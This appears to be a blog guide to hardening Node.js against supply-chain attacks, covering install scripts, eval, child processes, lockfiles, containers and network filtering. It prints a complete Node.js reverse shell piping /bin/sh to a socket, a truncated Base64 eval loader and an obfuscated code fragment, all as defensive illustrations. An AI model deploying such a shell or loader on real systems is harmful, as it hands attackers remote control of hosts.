This isn’t another AI-generated blog post about generic security practices. It gives detailed instructions for protecting Node.js applications from supply-chain attacks and describes security best practices that apply to any programming language.

According to GitHub's report "The state of open source and rise of AI in 2023", JavaScript and TypeScript are the #1 and #3 most popular languages on GitHub, respectively. Python is #2, and its adoption is growing with the rise of AI projects.

Acknowledge the Problem

Security concerns about software supply chains, including the NPM ecosystem, have gained significant attention since the SolarWinds breach. The escalating threat to developers and the applications they create highlights the critical need for awareness and for strategies that mitigate supply chain attacks and other security weaknesses throughout the software development process.

Supply chain threats manifest in various ways. Here, we focus on backdoors embedded in open-source packages, a frequent vector for large-scale attacks. Attacks against open source come from many directions: maintainer email takeovers through expired domains, binary takeovers through deleted S3 buckets, bad actors infiltrating the community, changes in repository ownership, or functional packages with hidden malware published by bad actors. Don't assume malware is easy to spot; it is often hidden in obfuscated code, sometimes inside an innocent-looking test file, and is hard to find just by reading the source code.

Notorious examples of popular packages that were compromised include ua-parser-js, with 12 million downloads per week; coa, with 6 million per week; and rc, with 14 million per week. Other attacks include the bignum package, affected by an S3 bucket takeover that distributed infected binaries, and thousands of other malicious packages, since removed from the official registries, that distributed malware or typosquatted the names of popular packages.

The official Node.js security best practices page describes the risk of malicious third-party modules (CWE-1357):

> Currently, in Node.js, any package can access powerful resources such as network access. Furthermore, because they also have access to the file system, they can send any data anywhere.
>
> All code running into a node process has the ability to load and run additional arbitrary code by using eval() or its equivalents. All code with file system write access may achieve the same thing by writing to new or existing files that are loaded.

Block Installation Scripts

Some dependencies include native addons written in C++ or another language. Their installation scripts can download prebuilt binaries from a remote location (an S3 bucket, GitHub, etc.) or build them locally using node-gyp.

The NPM CLI runs installation scripts by default during installation, which is an insecure default. Luckily, you can disable them per command with npm install --ignore-scripts or persistently with npm config set ignore-scripts true. I prefer setting it in the user or global configuration so the secure policy always applies.

Note: Yarn and PNPM can also block installation scripts. Bun does it by default.



Downloading files from untrusted locations is dangerous because it bypasses security controls, such as private repositories for NPM. When an untrusted repo is used, a third-party dependency can inject binaries into the developer's machine, the CI build pipeline, and the production environment. You can see this kind of attack in the image below:

Source: A package developer hosts a binary file on an S3 bucket and references it in their NPM package, and then deletes the bucket. An attacker creates an S3 bucket with the same name and uploads a malicious binary with the same name as the previously deleted file. When someone installs the NPM package, the malicious file is downloaded.


How to keep addon modules working

The recommended approach is to allowlist the packages that need to build locally and avoid the ones that download binaries from remote locations. The @lavamoat/allow-scripts package can enforce such an allowlist.
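Before writing that allowlist, it helps to know which dependencies actually declare install scripts. npm records this in package-lock.json (lockfile versions 2 and 3) as a hasInstallScript flag on each package entry, so a short script can list them. The sketch below is a standalone helper, not part of @lavamoat/allow-scripts, and its file name is only illustrative.

```javascript
// list-install-scripts.js: prints dependencies that declare install scripts,
// based on the "hasInstallScript" flag npm records in package-lock.json
// (lockfileVersion 2 and 3).
const fs = require("node:fs");

// Lockfile keys are install paths such as "node_modules/a/node_modules/@scope/b";
// the package name is whatever follows the last "node_modules/".
function nameFromPath(path) {
  const marker = "node_modules/";
  const index = path.lastIndexOf(marker);
  return index === -1 ? path : path.slice(index + marker.length);
}

function packagesWithInstallScripts(lockfile) {
  return Object.entries(lockfile.packages ?? {})
    // The "" key is the root project itself, so skip it.
    .filter(([path, meta]) => path !== "" && meta.hasInstallScript === true)
    .map(([path, meta]) => ({ name: nameFromPath(path), version: meta.version }));
}

// Usage: node list-install-scripts.js package-lock.json
const lockfilePath = process.argv[2];
if (lockfilePath) {
  const lockfile = JSON.parse(fs.readFileSync(lockfilePath, "utf8"));
  for (const { name, version } of packagesWithInstallScripts(lockfile)) {
    console.log(`${name}@${version}`);
  }
}
```

Every package it prints either earns a place on the allowlist or deserves a closer look.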

An alternative is to avoid building or downloading binaries from untrusted locations altogether. It uses the optionalDependencies feature to distribute each prebuilt binary as its own NPM package, selected based on the operating system, CPU architecture, and Node.js version. Popular packages apply this technique, and napi-rs/node-rs is a good reference for Node.js addons written in Rust.
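On the consuming side, this approach boils down to loading whichever platform package npm installed. The sketch below assumes a hypothetical @example/addon whose binaries are published as @example/addon-&lt;platform&gt;-&lt;arch&gt; packages; it is not the loader any particular tool generates. Because the binaries are ordinary registry packages, they come from the same trusted registry, are pinned by the lockfile's integrity hashes, and need no install script.

```javascript
// Minimal loader for an addon whose prebuilt binaries are published as
// separate packages. Assumption: a hypothetical "@example/addon" lists
// "@example/addon-linux-x64", "@example/addon-darwin-arm64", etc. under
// optionalDependencies, and each of those declares matching "os" and "cpu"
// fields so npm installs only the one for the current machine.
function platformPackageName(baseName, platform = process.platform, arch = process.arch) {
  return `${baseName}-${platform}-${arch}`;
}

function loadNativeAddon(baseName) {
  const name = platformPackageName(baseName);
  try {
    // No install script runs: the binary arrived as an ordinary registry package.
    return require(name);
  } catch (err) {
    throw new Error(`No prebuilt binary installed for ${process.platform}-${process.arch} (${name})`, { cause: err });
  }
}

module.exports = { platformPackageName, loadNativeAddon };
```

Real loaders often need to handle more cases, such as glibc versus musl on Linux.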

Block Dynamic Scripts

eval() and new Function() let third-party modules execute malicious code hidden in obfuscated strings, which makes them a common backdoor. You can disable both with the Node.js --disallow-code-generation-from-strings command line flag.

Evaluating obfuscated strings can lead to serious attacks. A single Base64-encoded string can download malware from a remote host, exfiltrate data such as environment variables, or open a reverse shell, all from an innocent-looking line of code:

```javascript
eval(new Buffer("KGZ1bm…","base64").toString("ascii"));
```

If the application uses a module that depends on dynamic code generation (e.g., ejs), consider replacing it with a safer alternative. This also protects against other attacks, such as code injection.
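To confirm the flag is actually in effect, for example in a container entrypoint, a process can try to compile a trivial string and see whether V8 refuses. This is a minimal sketch and the file name is illustrative. Keep in mind that, according to the Node.js CLI documentation, the flag does not affect the node:vm module.

```javascript
// check-codegen.js: reports whether this process may compile code from strings.
// Compare:
//   node check-codegen.js
//   node --disallow-code-generation-from-strings check-codegen.js
function codeGenerationAllowed() {
  try {
    // new Function() compiles a string into code, just like eval().
    new Function("return 1")();
    return true;
  } catch (err) {
    // With the flag set, V8 refuses to compile and throws an EvalError.
    if (err instanceof EvalError) return false;
    throw err;
  }
}

console.log(`code generation from strings allowed: ${codeGenerationAllowed()}`);
```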

Block Child Process

Node.js offers no stable controls for locking down what an application process can do. Applications can invoke every default system call and can abuse the ones they don't need to further an attack. In general, production applications shouldn't execute other binaries, and you can prevent that by blocking the execve syscall. A sample Node.js reverse shell demonstrates this vulnerability:

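```javascript
(function () {
  var net = require("net");
  // Start a shell whose input and output will be wired to the network.
  var sh = require("child_process").spawn("/bin/sh", []);
  var client = new net.Socket();
  // Connect back to the attacker's listener (here, 127.0.0.1:12345).
  client.connect(12345, "127.0.0.1", function () {
    client.pipe(sh.stdin);
    sh.stdout.pipe(client);
    sh.stderr.pipe(client);
  });
  // Commonly included in published payloads so the host application does not crash.
  return /a/;
})();
```

The code can be obfuscated with obfuscator.io to bypass existing protections: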

```javascript
(function(_0x19723c,_0x336b77){var _0x3c208e=_0x2e41,_0x322e46=_0x19723c();while(!![]){try{var _0x1d6b72=parseInt(_0x3c208e(0xc4))/0x1*(parseInt(_0x3c208e(0xc5))/0x2)+-parseInt(_0x3c208e(0xc9))/0x3+-parseInt(_0x3c208e(0xd3))/0x4 ...
```

The Node.js permission model is experimental and should not be used in production. Once it is generally available, developers will have more control over implementing security best practices that protect against some supply chain attack vectors. Meanwhile, let's explore another way to secure Node.js applications using the google/nsjail tool:

> A lightweight process isolation tool that utilizes Linux namespaces, cgroups, rlimits and seccomp-bpf syscall filters, leveraging the Kafel language for enhanced security.
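Whatever sandbox you choose, verify it rather than trust it. This minimal sketch probes whether the current process can still start other programs; running it inside and outside nsjail shows whether an execve filter is in effect. The file name is illustrative.

```javascript
// probe-exec.js: reports whether this process can start other programs.
const { spawnSync } = require("node:child_process");

function canExecute() {
  // Spawn the Node.js binary itself so the probe does not depend on /bin/sh,
  // which minimal images may not ship.
  const result = spawnSync(process.execPath, ["--version"], { encoding: "utf8" });
  if (result.error) {
    // A blocked execve is expected to surface here, e.g. with code "EPERM"
    // when the syscall fails with errno 1.
    return { allowed: false, code: result.error.code };
  }
  return { allowed: result.status === 0, code: null };
}

console.log(canExecute());
```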

The following seccomp filter, written in Kafel, blocks the Node.js child_process module by making every execve call fail with errno 1 (EPERM):

```
ERRNO(1) {
  // Prevent file execution via execve:
  // * Node.js: child_process, cluster modules
  // * Python: subprocess module, os.system() & os.popen()
  // * Golang: os/exec module
  // * Java: ProcessBuilder class, Runtime.exec()
  // * C: system() & execvp() functions
  execve
}
DEFAULT ALLOW
```

Block Prototype Pollution

Prototype pollution is a JavaScript language vulnerability that enables an attacker to add arbitrary properties to global object prototypes, which user-defined objects may then inherit.

Third-party modules can use this vulnerability to inject malicious code and intercept data, and external attackers can send hand-crafted requests to gain unauthorized access or expose data.

It can be exploited by overriding the __proto__ and constructor object properties, or by monkey patching built-in globals, for example:

```javascript
Array.prototype.push = function (item) {
  // overriding the global [].push: every array in the process now runs this code
};
```

The recommended mitigation is to use the nopp package from Snyk or the Node.js command line arguments --disable-proto=throw --frozen-intrinsics, but be careful with the frozen intrinsics option because it is currently experimental.
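To make the hand-crafted request scenario concrete, here is a minimal sketch of the classic vulnerable pattern: a recursive merge of untrusted JSON into an object. The function names are illustrative. The safe variant simply refuses keys that lead to prototypes; running the unsafe one under --disable-proto=throw should make its __proto__ lookup throw instead of reaching Object.prototype.

```javascript
function isObject(value) {
  return value !== null && typeof value === "object" && !Array.isArray(value);
}

// A naive recursive merge: a common source of prototype pollution.
function unsafeMerge(target, source) {
  for (const key of Object.keys(source)) {
    if (isObject(source[key])) {
      // For key "__proto__", target[key] is Object.prototype itself,
      // so the recursive call writes onto the prototype of every object.
      if (!isObject(target[key])) target[key] = {};
      unsafeMerge(target[key], source[key]);
    } else {
      target[key] = source[key];
    }
  }
  return target;
}

// Same merge, but it refuses keys that lead to prototypes.
const FORBIDDEN_KEYS = new Set(["__proto__", "constructor", "prototype"]);

function safeMerge(target, source) {
  for (const key of Object.keys(source)) {
    if (FORBIDDEN_KEYS.has(key)) continue;
    if (isObject(source[key])) {
      if (!isObject(target[key])) target[key] = {};
      safeMerge(target[key], source[key]);
    } else {
      target[key] = source[key];
    }
  }
  return target;
}

// JSON.parse creates "__proto__" as an ordinary own key, so a request body
// like this one reaches the merge intact.
const payload = JSON.parse('{"__proto__": {"isAdmin": true}}');

safeMerge({}, payload);
console.log(({}).isAdmin); // undefined

unsafeMerge({}, payload);
console.log(({}).isAdmin); // true: every object now looks like an admin

delete Object.prototype.isAdmin; // undo the pollution from this demo
```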

Enforce the Lockfile

Every application should use a lockfile. It pins every dependency (direct and transitive) to a specific version, location, and integrity hash. For the NPM CLI, this file lives in the project's root directory and is named package-lock.json. You can find more information about lockfiles for other package managers in the Yarn, PNPM, and Bun documentation.

Always commit the lockfile to version control (e.g., Git) so the CI build pipeline installs the correct dependencies for running tests and generating production builds. This also speeds up installation because it skips the module resolution phase.

Enforce the lockfile with an installation command that checks it against package.json and fails on any inconsistency instead of silently updating it. In the NPM CLI, that command is npm ci.

Additionally, use the lockfile-lint package to detect dependencies resolved from sources other than a trusted NPM registry. Dependencies fetched from GitHub are mutable, so they can be used to inject untrusted code and make installs less reproducible. lockfile-lint can also catch lockfile poisoning attacks that slip through code review. Usage example:

```
lockfile-lint --path package-lock.json --allowed-hosts npm
detected invalid host(s) for package: xyz@0.1.0
expected: registry.npmjs.org
actual: github.com
✖ Error: security issues detected!
```

Note: If you have a private registry, add it to the allowed-hosts parameter.
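To see what such a check involves, here is a minimal sketch of a host allowlist over package-lock.json (lockfile versions 2 and 3), in the spirit of lockfile-lint but not its implementation. It also insists on HTTPS URLs; the allowed host set and the file name are assumptions to adapt.

```javascript
// check-lockfile-hosts.js: a minimal sketch of a lockfile source check,
// assuming npm's package-lock.json v2/v3 layout. Not a replacement for lockfile-lint.
const fs = require("node:fs");

// Add your private registry host here if you use one.
const ALLOWED_HOSTS = new Set(["registry.npmjs.org"]);

function untrustedResolutions(lockfile, allowedHosts = ALLOWED_HOSTS) {
  const problems = [];
  for (const [path, meta] of Object.entries(lockfile.packages ?? {})) {
    // Skip the root project, symlinked workspaces, and entries without a URL.
    if (path === "" || meta.link || !meta.resolved) continue;
    let url = null;
    try {
      url = new URL(meta.resolved);
    } catch {
      // Not an absolute URL (for example, a local path): treat it as untrusted.
    }
    if (!url || url.protocol !== "https:" || !allowedHosts.has(url.hostname)) {
      problems.push({ path, resolved: meta.resolved });
    }
  }
  return problems;
}

// Usage: node check-lockfile-hosts.js package-lock.json
const lockfilePath = process.argv[2];
if (lockfilePath) {
  const lockfile = JSON.parse(fs.readFileSync(lockfilePath, "utf8"));
  const problems = untrustedResolutions(lockfile);
  for (const { path, resolved } of problems) console.error(`untrusted source for ${path}: ${resolved}`);
  if (problems.length > 0) process.exitCode = 1; // fail the CI step
}
```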



Keep Dependencies Updated

The NPM ecosystem is an awesome open-source community, but a large part of the internet depends on its packages. That makes it a high-profile target for attackers, who often exploit vulnerabilities in popular packages.

A healthy, secure application stays up to date with the latest security fixes for its dependencies. It should also use maintained package versions, not end-of-life software. There is a balance between the latest and the most stable versions: a production application should not adopt the newest database driver release before the community has proven it for at least a few weeks. Be eager to apply security fixes and cautious about major version bumps. Always read the changelog.
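One way to make "eager for fixes, cautious about majors" mechanical is to classify each proposed update and route only breaking ones to manual review. The sketch below is a hypothetical policy helper, not part of Dependabot or npm, and it only understands plain MAJOR.MINOR.PATCH versions.

```javascript
// Hypothetical update policy: apply patch and minor updates eagerly, but send
// breaking updates to a human who reads the changelog first.
// Only plain "MAJOR.MINOR.PATCH" versions are supported (no pre-release tags).
const VERSION = /^(\d+)\.(\d+)\.(\d+)$/;

function parseVersion(version) {
  const match = VERSION.exec(version);
  if (!match) throw new Error(`Unsupported version: ${version}`);
  return match.slice(1).map(Number);
}

function classifyUpdate(current, next) {
  const [curMajor, curMinor, curPatch] = parseVersion(current);
  const [nextMajor, nextMinor, nextPatch] = parseVersion(next);
  if (nextMajor !== curMajor) return "breaking";
  // SemVer makes no compatibility promise for 0.x, and npm's caret ranges
  // (^0.2.3 means >=0.2.3 <0.3.0) treat a 0.x minor bump as breaking.
  if (nextMinor !== curMinor) return curMajor === 0 ? "breaking" : "minor";
  if (nextPatch !== curPatch) return "patch";
  return "none";
}

function needsManualReview(current, next) {
  return classifyUpdate(current, next) === "breaking";
}

console.log(classifyUpdate("4.17.20", "4.17.21")); // patch
console.log(needsManualReview("8.4.0", "9.0.0")); // true
```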

The good news is that GitHub offers a free service called Dependabot that can automatically open pull requests for security fixes based on the GitHub Advisory Database.



Audit Dependencies

Another security must-have is a Software Composition Analysis (SCA) tool in the development lifecycle. It analyzes open-source dependencies for vulnerabilities and associated risks such as reputation, licenses, number of downloads, install scripts, and maintenance status.

The NPM CLI offers the npm audit command, powered by the GitHub Advisory Database, which can be included in the development process and GitHub PR checks. However, more comprehensive tools such as Snyk and Socket.dev are recommended; they integrate with GitHub and are free for open-source projects and individual developers.
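For a simple threshold, npm audit --audit-level=high already makes the command exit with a non-zero code when high or critical issues exist. When a pipeline needs its own rules, the JSON report from npm audit --json can be read directly. The following is a sketch under that assumption: the function name is illustrative and the sample report is made up.

```javascript
// audit-gate.js: hypothetical CI gate over the report from `npm audit --json`
// (npm 7 and later), whose metadata.vulnerabilities field holds per-severity counts.
const SEVERITIES = ["info", "low", "moderate", "high", "critical"];

function findingsAtOrAbove(report, minSeverity = "high") {
  const threshold = SEVERITIES.indexOf(minSeverity);
  if (threshold === -1) throw new Error(`Unknown severity: ${minSeverity}`);
  const counts = report?.metadata?.vulnerabilities ?? {};
  return SEVERITIES.slice(threshold)
    .map((severity) => ({ severity, count: counts[severity] ?? 0 }))
    .filter(({ count }) => count > 0);
}

// Made-up sample report, trimmed to the fields this sketch reads.
const sample = { metadata: { vulnerabilities: { info: 0, low: 2, moderate: 1, high: 1, critical: 0, total: 4 } } };
console.log(findingsAtOrAbove(sample, "high")); // [ { severity: 'high', count: 1 } ]
```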

Other valuable tools are worth considering; for example, the Open Source Security Foundation (OpenSSF) Scorecard tool integrates well into a CI build pipeline or runs as a GitHub application.

Run in Unprivileged Mode

Running the application as the root user or in privileged mode is not recommended because it goes against the principle of least privilege. Malicious dependencies can leverage root and the extra privileges to gain unauthorized access and, if not contained, reach every system capability. This applies to both virtual machines and container environments.

The recommended practice is to run Node.js as a dedicated user and never run the container in privileged mode. This user should only be able to do what the application requires, which includes listening only on non-privileged ports (1024 and above). Dockerfile snippet example:

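```dockerfile
# Create an unprivileged user and group with fixed IDs
# (Debian adduser syntax; BusyBox/Alpine uses different flags).
RUN addgroup --gid 1000 node && \
    adduser --uid 1000 --gid 1000 --disabled-password --gecos "" node
WORKDIR /home/node/app
# Copy the app files, owned by the unprivileged user.
COPY --chown=node:node . /home/node/app
# Drop root privileges for everything that runs after this line.
USER 1000
```

Note: Some Docker images, including the official Node.js images, already create the node user, so skip that step when using them.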
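Container settings can drift, so the application itself can refuse to start with root privileges as a safety net. This is a minimal sketch; the module and function names are illustrative.

```javascript
// startup-check.js: refuse to start with root privileges, as a safety net
// if the container or VM is misconfigured. process.geteuid() exists only on
// POSIX platforms, so the check is skipped elsewhere (e.g. Windows).
function isRunningAsRoot() {
  return typeof process.geteuid === "function" && process.geteuid() === 0;
}

function assertUnprivileged() {
  if (isRunningAsRoot()) {
    throw new Error("Refusing to start as root; run as an unprivileged user (e.g. USER 1000).");
  }
}

module.exports = { isRunningAsRoot, assertUnprivileged };
```

Call assertUnprivileged() at the very top of the entry point, before requiring other dependencies, since a malicious package runs its code as soon as it is loaded.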

Run in Read-Only Filesystem

Applications should run as immutable processes to prevent unauthorized modifications at runtime and persistent malware infections. The best way to enforce this in a container environment is to make the root filesystem read-only and create dedicated volumes outside it for the paths that need write access. You can do this in Docker with the following command:

```shell
docker run --read-only -v app-data:/data my_image
```

In a Kubernetes environment, you can configure this through the container's securityContext and enforce it per pod or namespace with a security admission controller. Here’s an example container spec:

```yaml
containers:
  - name: app # hypothetical container name
    securityContext:
      # Mount the container's root filesystem as read-only.
      readOnlyRootFilesystem: true
```

Use a Distroless Image

What is the problem with Debian- and CentOS-based Node.js images? They are full operating systems that contain many packages with vulnerabilities, which increases the attack surface and helps malicious dependencies or other attackers exploit those vulnerabilities. The official Debian-based Node.js image is 1GB in size; Node.js also offers slim and alpine variants, which strip out many packages and considerably reduce vulnerabilities.

Why a distroless image? It is not a full operating system; it contains only what the Node.js process needs to run, such as glibc and CA certificates. Most importantly, it does not include a package manager, a shell, or the NPM CLI, and its nonroot variants run the process as an unprivileged user instead of root.

Instead of building a distroless image yourself, consider adopting Google's distroless images, which Kubernetes core uses, or Chainguard images for use cases that require a support SLA and other features, such as meeting FIPS requirements for cryptography modules.

Because distroless images do not contain the tools required to build applications, use a multi-stage Dockerfile that builds in one stage and copies the result into the final image, for example:

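```dockerfile
# Build stage: the full Node.js image, with npm available.
FROM node:20 AS build-env
COPY . /app
WORKDIR /app
# Install exactly what the lockfile pins, without devDependencies.
RUN npm ci --omit=dev

# Runtime stage: no shell, package manager, or npm.
# The :nonroot tag runs the process as an unprivileged user.
FROM gcr.io/distroless/nodejs20-debian12:nonroot
COPY --from=build-env /app /app
WORKDIR /app
# The image's entrypoint is node, so CMD only names the script.
CMD ["index.js"]
```

Filter Network Traffic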

Network segmentation and the principle of least privilege are standard security practices that should apply to all production and CI build environments. Node.js applications are no exception, and system administrators must enforce them.



Inbound traffic

The deployed application should only accept traffic from authorized resources. On the network layer, this means restricting specific subnets, IP addresses, and ports. The application layer should implement authentication, either via access tokens or mTLS using a service mesh. Access control to a resource cannot be based solely on access to its network, which is important because it prevents unauthorized access and lateral movement attacks. The inbound traffic is filtered at the network and application layers to implement a defense-in-depth strategy.

Source: Deployment topology of a service mesh. The Istio proxy runs as a sidecar for Service A and Service B. The Istio proxy communicates with the Istio control plane to set up a secure mTLS connection between services.

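When a service mesh is not available, or as an extra layer behind one, Node.js can enforce mTLS itself with the built-in https module. The sketch below is illustrative: the environment variable names are hypothetical, and certificate issuance and rotation, which a mesh handles for you, are out of scope.

```javascript
// mtls-server.js: a minimal HTTPS server that only talks to clients presenting
// a certificate signed by a trusted CA. Assumption: TLS_KEY, TLS_CERT and
// TLS_CA are hypothetical environment variables holding PEM file paths.
const fs = require("node:fs");
const https = require("node:https");

function mtlsOptions({ key, cert, ca }) {
  return {
    key, // server private key
    cert, // server certificate
    ca, // CA that signs the client certificates we accept
    requestCert: true, // ask every client for a certificate
    rejectUnauthorized: true, // abort the handshake if it is missing or invalid
  };
}

function handler(req, res) {
  // Defense in depth: the handshake already rejects unauthorized clients,
  // but check again before serving anything.
  if (!req.socket.authorized) {
    res.writeHead(401);
    res.end();
    return;
  }
  const { subject } = req.socket.getPeerCertificate();
  res.writeHead(200, { "content-type": "text/plain" });
  res.end(`hello, ${subject.CN}\n`);
}

const { TLS_KEY, TLS_CERT, TLS_CA } = process.env;
if (TLS_KEY && TLS_CERT && TLS_CA) {
  const options = mtlsOptions({
    key: fs.readFileSync(TLS_KEY),
    cert: fs.readFileSync(TLS_CERT),
    ca: fs.readFileSync(TLS_CA),
  });
  // 8443 is a non-privileged port, so no root is needed.
  https.createServer(options, handler).listen(8443);
}
```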

Outbound traffic

Even though it is hard to resist the temptation to allowlist 0.0.0.0/0, the default policy should deny outbound traffic. Allow outbound traffic only to the private subnets the application needs, and allowlist internet destinations (IPs and ports) on an as-needed basis.

When applications connect to cloud provider-managed services, such as AWS S3, the traffic goes through the public internet. The problem is that the application cannot allowlist the provider's large, dynamic IP ranges without being virtually open to the outside world. One solution is private links (AWS, Azure, GCP), but they come at an extra cost.



The same problem can happen with many other SaaS applications without a private link option. In this case, the solution is to implement an egress proxy that allowlists the domains, using a standalone Squid proxy or transparently via a service mesh egress gateway. The benefits of an egress proxy include traffic monitoring via logs to detect active or past threats and block zero-day supply chain attacks trying to reach a remote server.

Source: A service mesh topology that demonstrates an application container communicating to an external website through a gateway proxy container.

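The heart of such a proxy is a domain allowlist. Squid and egress gateways have their own configuration for it; the sketch below only illustrates the matching decision a proxy applies to the requested host (for example, the CONNECT target or TLS SNI), using a hypothetical allowlist.

```javascript
// Core decision of a domain-allowlisting egress proxy, as a sketch.
// Assumption: the allowlist entries below are hypothetical. An entry such as
// "*.internal.example.com" matches its subdomains but not the bare domain.
const ALLOWED_DOMAINS = ["registry.npmjs.org", "api.example.com", "*.internal.example.com"];

function isAllowedHost(hostname, allowlist = ALLOWED_DOMAINS) {
  // DNS names are case-insensitive and may carry a trailing root dot.
  const host = hostname.toLowerCase().replace(/\.$/, "");
  return allowlist.some((entry) =>
    entry.startsWith("*.")
      ? host.endsWith(entry.slice(1)) // suffix starts with ".", so it matches on a label boundary
      : host === entry,
  );
}

console.log(isAllowedHost("registry.npmjs.org")); // true
console.log(isAllowedHost("attacker.example.net")); // false
```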

Protect the Developer

The developer is the first line of defense against a supply chain attack and is often the one who installs malicious packages or untrusted software from the internet. The attack surface is massive, and attacks can happen in many ways.

The consequences of a compromised developer machine can be severe because it often has privileged access to the production environment and stores confidential information and secrets. Attackers can use this information to mount a persistent attack that severely damages the individual's personal life or the company they work for.

The recommendation is to start by securing the identities of all personal and corporate applications, enforcing phishing-resistant multi-factor authentication via passkeys or security keys. Okta, for example, is a cloud identity management service that integrates with many applications and supports these phishing-resistant authenticators.



Second, the development environment can be isolated from the rest of the machine using a virtual machine or containers, limiting access to resources required for development. The devcontainers extension for VSCode is an easy way to set up a transparent development experience.

Source: The container runs a VS Code Server workspace extension as a developer environment to isolate the environment from the local OS.


In addition to the security practices above, developer machines should use anti-virus and firewall software to detect malicious activities and monitor inbound and outbound network traffic. Security threats evolve rapidly, so monitoring needs to happen in real time.

Security mission accomplished!